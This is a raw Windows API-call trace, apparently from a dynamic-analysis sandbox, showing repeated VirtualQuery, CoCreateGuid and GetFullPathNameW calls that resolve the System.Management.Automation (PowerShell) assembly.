	[0286.820] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.820] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.820] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.820] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.820] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.820] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.821] VirtualQuery (in: lpAddress=0x12b960, lpBuffer=0x12c820, dwLength=0x30 | out: lpBuffer=0x12c820*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.821] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.821] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.821] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.821] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.821] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x6f0c058c, Data2=0x863f, Data3=0x427e, Data4=([0]=0x87, [1]=0x98, [2]=0x87, [3]=0x26, [4]=0xc, [5]=0x21, [6]=0x85, [7]=0x85))) returned 0x0
	[0286.822] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.822] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.823] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.823] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.823] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.823] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.823] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.823] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.823] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.823] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.824] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.824] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.824] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.824] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.824] VirtualQuery (in: lpAddress=0x12b960, lpBuffer=0x12c820, dwLength=0x30 | out: lpBuffer=0x12c820*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.824] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.824] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.824] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.824] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.825] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xb377f651, Data2=0xc545, Data3=0x4fe5, Data4=([0]=0xbf, [1]=0xe6, [2]=0x4, [3]=0xff, [4]=0x4a, [5]=0xec, [6]=0x18, [7]=0x74))) returned 0x0
	[0286.825] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xd2cc110d, Data2=0xdf8f, Data3=0x40ec, Data4=([0]=0x8a, [1]=0xc1, [2]=0x62, [3]=0x44, [4]=0xc2, [5]=0xb3, [6]=0x12, [7]=0x5))) returned 0x0
	[0286.826] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.826] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.826] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.826] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.826] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.826] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.827] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.827] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.827] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.827] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.827] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.827] VirtualQuery (in: lpAddress=0x12b390, lpBuffer=0x12c250, dwLength=0x30 | out: lpBuffer=0x12c250*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.828] VirtualQuery (in: lpAddress=0x12b420, lpBuffer=0x12c2e0, dwLength=0x30 | out: lpBuffer=0x12c2e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.828] VirtualQuery (in: lpAddress=0x12be30, lpBuffer=0x12ccf0, dwLength=0x30 | out: lpBuffer=0x12ccf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.829] VirtualQuery (in: lpAddress=0x12be30, lpBuffer=0x12ccf0, dwLength=0x30 | out: lpBuffer=0x12ccf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.829] VirtualQuery (in: lpAddress=0x12be30, lpBuffer=0x12ccf0, dwLength=0x30 | out: lpBuffer=0x12ccf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.829] VirtualQuery (in: lpAddress=0x12be30, lpBuffer=0x12ccf0, dwLength=0x30 | out: lpBuffer=0x12ccf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.830] VirtualQuery (in: lpAddress=0x12b520, lpBuffer=0x12c3e0, dwLength=0x30 | out: lpBuffer=0x12c3e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.830] VirtualQuery (in: lpAddress=0x12b5b0, lpBuffer=0x12c470, dwLength=0x30 | out: lpBuffer=0x12c470*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.830] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.830] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.830] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.830] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.830] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.831] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.831] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.831] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.831] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.831] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.559] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0287.559] VirtualQuery (in: lpAddress=0x12b960, lpBuffer=0x12c820, dwLength=0x30 | out: lpBuffer=0x12c820*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0287.559] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0287.560] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0287.560] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0287.560] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0287.560] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xdb933748, Data2=0x843e, Data3=0x4b7c, Data4=([0]=0x93, [1]=0xba, [2]=0xe9, [3]=0x88, [4]=0x77, [5]=0xf6, [6]=0x46, [7]=0xae))) returned 0x0
	[0287.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
